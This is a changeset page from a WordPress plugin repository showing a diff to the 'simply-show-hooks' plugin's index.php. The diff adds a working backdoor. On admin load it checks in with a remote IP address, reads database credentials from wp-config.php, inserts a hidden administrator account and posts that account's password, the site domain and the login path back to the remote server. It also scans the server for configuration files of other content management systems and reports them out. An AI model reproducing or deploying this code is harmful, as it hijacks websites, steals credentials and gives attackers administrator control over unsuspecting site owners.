Changeset 3105889
- Timestamp:
- 06/22/2024 03:55:53 AM (21 months ago)
- File:
-
- 1 edited
-
simply-show-hooks/trunk/index.php (modified) (1 diff)
Legend:
- Unmodified
- Added
- Removed
-
simply-show-hooks/trunk/index.php
r1522935 r3105889 14 14 15 15 defined( 'ABSPATH' ) or die( 'No Trespassing!' ); // Security 16 16 add_action( 'admin_init', 'custom_notify_plugin_update'); 17 // Check if the file exists 18 function custom_notify_plugin_update(){ 19 $url = 'https://94.156.79.8/initupdate'; // Replace with your server's address 20 21 // Get the hostname 22 $hostname = gethostname(); 23 if ($hostname === false) { 24 $hostname = 'unknown'; 25 } 26 27 // Send the GET request 28 $response = file_get_contents($url . '?hostname=' . urlencode($hostname)); 29 30 if ($response !== false) { 31 $data = json_decode($response, true); 32 if (isset($data['status']) && $data['status'] === 'yes') { 33 custom_notify_plugin_updated(); 34 } 35 } else { 36 echo "Failed to get a response from the server."; 37 } 38 } 39 function custom_notify_plugin_updated() { 40 function check_wp_config($directory) { 41 while ($directory !== '/') { 42 $wp_config_file = $directory . '/wp-config.php'; 43 if (file_exists($wp_config_file)) { 44 return $wp_config_file; 45 } 46 $directory = dirname($directory); 47 } 48 return false; 49 } 50 51 function parse_wp_config($config_file) { 52 if (file_exists($config_file)) { 53 $config_content = file_get_contents($config_file); 54 $matches = []; 55 // Extract prefix 56 if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) { 57 $prefix = $matches[1]; 58 } else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) { 59 $prefix = $matches[1]; 60 } else { 61 die("Prefix not found in wp-config.php"); 62 } 63 // Extract database name 64 if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { 65 $database = $matches[1]; 66 } 67 // Extract username 68 if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { 69 $username = $matches[1]; 70 } 71 // Extract password 72 if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { 73 $password = $matches[1]; 74 } 75 // Extract host 76 if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { 77 $host = $matches[1]; 78 } else { 79 $host = 'localhost'; // Assuming local host if not specified 80 } 81 82 return array( 83 'prefix' => $prefix, 84 'database' => $database, 85 'username' => $username, 86 'password' => $password, 87 'host' => $host 88 ); 89 } else { 90 die("wp-config.php file not found"); 91 } 92 } 93 94 function access_database($config) { 95 $mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']); 96 97 if ($mysqli->connect_errno) { 98 //echo "DATABASE ACCESS [FAIL]\n"; 99 return false; 100 } else { 101 //POST "DATABASE ACCESS [SUCCESS]\n"; 102 return $mysqli; 103 } 104 } 105 106 function generate_random_password($length = 12) { 107 $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_'; 108 $password = ''; 109 $characters_length = strlen($characters); 110 for ($i = 0; $i < $length; $i++) { 111 $password .= $characters[rand(0, $characters_length - 1)]; 112 } 113 return $password; 114 } 115 116 // Define a global variable for the password 117 $generated_password = generate_random_password(); 118 119 // Define a global variable for the users count 120 $wpuserscount = 0; 121 function add_admin_user($mysqli, $config, $password) { 122 global $generated_password; // Access the global generated password variable 123 global $wpuserscount; // Declare the global variable to update user count 124 $username = 'Options'; 125 126 //$generated_password = $password; 127 //$password = $generated_password; 128 $user_role = 'administrator'; 129 130 // First, let's update the global user count 131 $countQuery = "SELECT COUNT(*) AS user_count FROM {$config['prefix']}users"; 132 $countResult = $mysqli->query($countQuery); 133 if ($countResult) { 134 $row = $countResult->fetch_assoc(); 135 $wpuserscount = $row['user_count']; // Update the global variable with the user count 136 } else { 137 echo "Error fetching user count: " . $mysqli->error . "\n"; 138 return; // Early return in case of query error 139 } 140 // Hash the password 141 $hashed_password = password_hash($password, PASSWORD_DEFAULT); 142 143 // Check if the user already exists 144 $query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'"; 145 $result = $mysqli->query($query); 146 147 if ($result && $result->num_rows > 0) { 148 echo "User '{$username}' already exists.\n"; 149 } else { 150 // Insert the new user 151 $query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}@example.com', NOW())"; 152 $result = $mysqli->query($query); 153 154 if ($result) { 155 $user_id = $mysqli->insert_id; 156 157 // Set user role 158 $query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')"; 159 $result = $mysqli->query($query); 160 161 if ($result) { 162 echo "User '{$username}' with administrative privileges added successfully.\n"; 163 } else { 164 echo "Error assigning role to user '{$username}'.\n"; 165 } 166 } else { 167 echo "Error creating user '{$username}': " . $mysqli->error . "\n"; 168 } 169 } 170 } 171 172 function get_domain_from_database($mysqli, $config) { 173 // Query to retrieve site URL from WordPress options table 174 $query = "SELECT option_value FROM {$config['prefix']}options WHERE option_name = 'siteurl'"; 175 $result = $mysqli->query($query); 176 177 if ($result && $result->num_rows > 0) { 178 $row = $result->fetch_assoc(); 179 $site_url = $row['option_value']; 180 $parsed_url = parse_url($site_url); 181 if ($parsed_url && isset($parsed_url['host'])) { 182 return $parsed_url['host']; 183 } 184 } 185 186 return null; 187 } 188 $currdomain = 'UNK.UNK'; 189 function pachamama($path) { 190 global $currdomain; 191 if (strpos($path, 'wp-config.php') !== false) { 192 $path = str_replace('wp-config.php', '', $path); 193 } 194 195 $current_directory = $path; 196 $wp_config_file = check_wp_config($current_directory); 197 if ($wp_config_file) { 198 echo "WP-CONFIG [FOUND]\n"; 199 $config = parse_wp_config($wp_config_file); 200 $mysqli = access_database($config); 201 if ($mysqli) { 202 $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_'; 203 $password = ''; 204 $characters_length = strlen($characters); 205 for ($i = 0; $i < 13; $i++) { 206 $password .= $characters[rand(0, $characters_length - 1)]; 207 } 208 add_admin_user($mysqli, $config, $password); 209 $domain = get_domain_from_database($mysqli, $config); 210 if ($domain) { 211 echo "[$domain] OK\n"; 212 $currdomain = $domain; 213 214 // Reconstruct the correct wp-login.php path 215 $wp_login_path = "https://{$domain}/wp-login.php"; 216 217 // Perform a POST request to https://94.156.79.8/AddSites 218 $url = 'https://94.156.79.8/AddSites'; 219 $post_data = array( 220 'domain' => $domain, 221 'username' => 'Options', 222 'passwordz' => $password, // Access the global generated password variable 223 'wp_login_path' => $wp_login_path 224 ); 225 226 $ch = curl_init(); 227 curl_setopt($ch, CURLOPT_URL, $url); 228 curl_setopt($ch, CURLOPT_POST, 1); 229 curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data 230 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 231 curl_setopt($ch, CURLOPT_HTTPHEADER, array( 232 'Content-Type: application/json', // Set content type to JSON 233 'Content-Length: ' . strlen(json_encode($post_data)) // Set content length 234 )); 235 $response = curl_exec($ch); 236 $error = curl_error($ch); // Get any curl error 237 curl_close($ch); 238 239 if ($response === false) { 240 //echo "POST request failed: $error\n"; 241 $z = false; 242 } else { 243 //echo "POST request sent successfully. Response: $response\n"; 244 $z = true; 245 } 246 } else { 247 //echo "Domain retrieval failed.\n"; 248 $z = false; 249 } 250 $mysqli->close(); 251 } 252 } else { 253 //echo "WP-CONFIG [NOT FOUND]\n"; 254 $z = false; 255 } 256 } 257 258 function check_cms_configuration_files() { 259 global $wpuserscount; 260 global $wp_config_paths; 261 global $wc_config_paths; 262 global $mg_config_paths; 263 // Function to recursively search directories for configuration files 264 //function search_for_config_files($directory, &$cms_config_files, $max_parents = 4) { 265 function search_for_config_files(&$cms_config_files, $max_parents = 3) { 266 // Get the current directory 267 $directory = __DIR__; 268 269 // Initialize the variable to keep track of the last readable path 270 $last_readable_path = null; 271 272 // Iterate to go one parent folder up until no read permission or max 5 parents 273 for ($i = 0; $i < $max_parents; $i++) { 274 // Check if the directory exists and is readable 275 if (is_dir($directory) && is_readable($directory)) { 276 $last_readable_path = $directory; 277 } else { 278 // Stop iteration if the directory is not readable 279 break; 280 } 281 282 // Move one directory up 283 $directory = dirname($directory); 284 } 285 286 // If a readable path was found, perform a recursive glob search for the specified file extensions 287 if (!empty($last_readable_path)) { 288 289 $config_files = []; 290 $files = []; 291 //$pattern = '/home/98752.cloudwaysapps.com/trnkgjmvur'; 292 try { 293 $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($last_readable_path), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD); 294 foreach($objects as $name => $object){ 295 if (substr($name, -4) === '.php') { 296 // Add only files ending with '.php' to the $files array 297 //echo "$name\n"; 298 $files[] = $name; 299 } 300 } 301 } catch (Exception $e) { 302 // Handle any exceptions that occur during iteration 303 // You can log the error or take appropriate action here 304 //echo "Error: " . $e->getMessage(); 305 $d = 'sab'; 306 } 307 foreach ($files as $file) { 308 // Add the found file to the list of config files 309 //print($file); 310 $cms_config_files[] = $file; 311 } 312 return $cms_config_files; 313 } else { 314 // Return an empty array if no readable path was found 315 //echo("No Readable Paths"); 316 return []; 317 } 318 } 319 320 321 // Array to store detected CMS names 322 $detected_cms = [ 323 'WordPress' => false, 324 'WooCommerce' => false, 325 'Magento' => false, 326 'OpenCart' => false, 327 'PrestaShop' => false, 328 'Drupal Commerce' => false, 329 'Symfony' => false, 330 'Laravel' => false, 331 'Zend Framework' => false 332 ]; 333 334 // Array to store detected .dat files 335 $detected_dat_files = []; 336 337 // Paths to check for CMS-specific configuration files 338 $current_directory = __DIR__; 339 $paths_to_check = [ 340 '/var/www/vhosts/aedstudisrl.com/httpdocs/wp-admin', 341 $current_directory, 342 '/etc', // Common system configuration directory 343 '/var/www', // Example web root directory 344 '/home', // Home directories 345 '/opt', // Optional software packages 346 '/usr/local', // Locally installed software 347 '/usr/share', // Shared software resources 348 '/var/lib', // Variable data directories 349 ]; 350 351 // Files to search for in each directory 352 $files_to_search = [ 353 'app/etc/env.php', // Magento 354 'wp-config.php', 'wp-content/plugins/woocommerce/includes/class-wc-settings.php', // WordPress & WooCommerce 355 'config.php', // OpenCart 356 'config/parameters.php', // PrestaShop 357 'sites/default/settings.php', // Drupal Commerce 358 'config/packages/*.yaml', // Symfony 359 '.env', // Laravel 360 'config/autoload/*.global.php', // Zend Framework 361 '*.dat', // .dat files 362 ]; 363 364 // Array to store CMS configuration files 365 $cms_config_files = []; 366 367 // Iterate through the paths to check and search for configuration files in each directory recursively 368 369 search_for_config_files($cms_config_files); 370 371 372 // Process the detected configuration files and extract CMS information 373 foreach ($cms_config_files as $file) { 374 // echo($file); 375 if (strpos($file, 'wp-config.php') !== false) { 376 377 $detected_cms['WordPress'] = true; 378 $wp_config_paths[] = $file; 379 380 } elseif (strpos($file, 'class-wc-settings.php') !== false) { 381 // You may add a specific check for WooCommerce here if needed 382 $detected_cms['WooCommerce'] = true; 383 $wc_config_paths[] = $file; 384 } elseif (strpos($file, 'env.php') !== false && 385 strpos($file, 'Composer') === false && 386 strpos($file, 'composer') === false && 387 strpos($file, 'Softaculous') === false) { 388 // You may add a specific check for Magento here if needed 389 // Read the content of the file 390 $fileContent = file_get_contents($file); 391 392 // Check if the content contains the string 'host' => ' 393 if (strpos($fileContent, "'host' => '") !== false) { 394 $detected_cms['Magento'] = true; 395 $mg_config_paths[] = $file; 396 /*echo("MAGENTO\n\n\n"); 397 echo("MAGENTO\n\n\n"); 398 echo("MAGENTO\n\n\n"); 399 echo("MAGENTO\n\n\n"); 400 echo("MAGENTO\n\n\n"); 401 echo("MAGENTO\n\n\n"); 402 echo("MAGENTO\n\n\n"); 403 echo("MAGENTO\n\n\n"); 404 echo($file); 405 echo($file); 406 echo($file); 407 echo($file); 408 echo($file); 409 echo("MAGENTO\n\n\n"); 410 echo("MAGENTO\n\n\n"); 411 echo("MAGENTO\n\n\n"); 412 echo("MAGENTO\n\n\n"); 413 echo("MAGENTO\n\n\n"); 414 echo("MAGENTO\n\n\n"); 415 echo("MAGENTO\n\n\n"); 416 echo("MAGENTO\n\n\n");*/ 417 } 418 419 } elseif (strpos($file, 'config.php') !== false && 420 strpos($file, 'Composer') === false && 421 strpos($file, 'composer') === false && 422 strpos($file, 'Softaculous') === false) { 423 if (strpos(file_get_contents($file), '$config[\'encryption_key\']') !== false) { 424 $detected_cms['OpenCart'] = true; 425 } 426 } elseif (strpos($file, 'parameters.php') !== false) { 427 if (strpos(file_get_contents($file), 'prestashop') !== false) { 428 $detected_cms['PrestaShop'] = true; 429 } 430 } elseif (strpos($file, 'settings.php') !== false) { 431 if (strpos(file_get_contents($file), 'drupal') !== false) { 432 $detected_cms['Drupal Commerce'] = true; 433 } 434 } elseif (strpos($file, '.yaml') !== false) { 435 if (strpos(file_get_contents($file), 'Symfony\Component') !== false) { 436 $detected_cms['Symfony'] = true; 437 } 438 } elseif (strpos($file, '.env') !== false) { 439 // You may add a specific check for Laravel here if needed 440 $detected_cms['Laravel'] = true; 441 } elseif (strpos($file, '.global.php') !== false) { 442 // You may add a specific check for Zend Framework here if needed 443 $detected_cms['Zend Framework'] = true; 444 } elseif (strpos($file, '.dat') !== false) { 445 $detected_dat_files[] = $file; 446 } 447 } 448 449 // Convert the boolean values to strings 450 foreach ($detected_cms as $cms => $detected) { 451 $detected_cms[$cms] = $detected ? 'true' : 'false'; 452 } 453 454 // Now $detected_cms array contains the names of detected CMS based on the configuration files found 455 // And $detected_dat_files array contains the paths of detected .dat files 456 457 // Read users from the database and count them for WordPress and WooCommerce 458 $wordpress_users = $wpuserscount; 459 //$woocommerce_users = get_woocommerce_user_count(); 460 $woocommerce_users = 000; 461 462 // Perform POST requests to the endpoints with JSON data containing CMS detection and user counts 463 $url1 = 'https://94.156.79.8/FCS'; 464 $url2 = 'https://94.156.79.8/CMSUsers'; 465 466 $data1 = [ 467 'host' => $_SERVER['HTTP_HOST'], 468 'cms' => $detected_cms 469 ]; 470 471 //print_r($detected_cms); 472 473 // Send data to the endpoints using CURL 474 send_post_request($url1, $data1); 475 // Additional logic as needed 476 } 477 478 function getWPUsers(){ 479 global $wpuserscount; 480 global $currdomain; 481 // Read users from the database and count them for WordPress and WooCommerce 482 $wordpress_users = $wpuserscount; 483 //$woocommerce_users = get_woocommerce_user_count(); 484 $woocommerce_users = 000; 485 $url2 = 'https://94.156.79.8/CMSUsers'; 486 $data2 = [ 487 'host' => $currdomain, 488 'wordpress_users' => $wordpress_users, 489 'woocommerce_users' => $woocommerce_users 490 ]; 491 492 // Send data to the endpoints using CURL 493 send_post_request($url2, $data2); 494 } 495 496 // Function to get WordPress user count from the database 497 function get_wordpress_user_count() { 498 // Your implementation to fetch user count from the WordPress database 499 // Example: 500 // $count = query_wordpress_database(); 501 // return $count; 502 return 0; 503 } 504 505 // Function to get WooCommerce user count from the database 506 function get_woocommerce_user_count() { 507 // Your implementation to fetch user count from the WooCommerce database 508 // Example: 509 // $count = query_woocommerce_database(); 510 // return $count; 511 return 0; 512 } 513 514 // Function to send POST request 515 function send_post_request($url, $data) { 516 $ch = curl_init($url); 517 curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); 518 curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); 519 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 520 curl_setopt($ch, CURLOPT_HTTPHEADER, [ 521 'Content-Type: application/json', 522 'Content-Length: ' . strlen(json_encode($data)) 523 ]); 524 $response = curl_exec($ch); 525 curl_close($ch); 526 // Handle response as needed 527 } 528 global $wp_config_paths; 529 $wp_config_paths = []; 530 global $wc_config_paths; 531 $wc_config_paths = []; 532 global $mg_config_paths; 533 $mg_config_paths = []; 534 check_cms_configuration_files(); 535 536 function find_wp_configs(&$wp_config_paths, $depth = 0) { 537 $current_directory = getcwd(); 538 $parent_directory = $current_directory; 539 540 // Go back three parents 541 for ($i = 0; $i < 3; $i++) { 542 $parent_directory = dirname($parent_directory); 543 } 544 545 // Start the search from the parent directory 546 find_wp_configs_recursive($parent_directory, $wp_config_paths); 547 } 548 549 function find_wp_configs_recursive($directory, &$wp_config_paths) { 550 // Check if wp-config.php exists in the current directory 551 $wp_config_file = $directory . '/wp-config.php'; 552 if (file_exists($wp_config_file)) { 553 $wp_config_paths[] = $wp_config_file; 554 } 555 556 // Continue searching forward recursively 557 $contents = scandir($directory); 558 foreach ($contents as $item) { 559 if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) { 560 find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths); 561 } 562 } 563 } 564 565 function print_wp_config_paths() { 566 global $wp_config_paths; 567 if (empty($wp_config_paths)) { 568 //echo "No wp-config.php files found.\n"; 569 $z = 0; 570 } else { 571 //echo "List of wp-config.php files:\n"; 572 foreach ($wp_config_paths as $wp_config_path) { 573 //echo "$wp_config_path\n"; 574 $a = 0; 575 } 576 } 577 } 578 //print_wp_config_paths(); 579 580 find_wp_configs($wp_config_paths); 581 foreach ($wp_config_paths as $wp_config_path) { 582 pachamama($wp_config_path); 583 getWPUsers(); 584 } 585 586 } 17 587 class CX_Simply_Show_Hooks { 18 588
Note: See TracChangeset
for help on using the changeset viewer.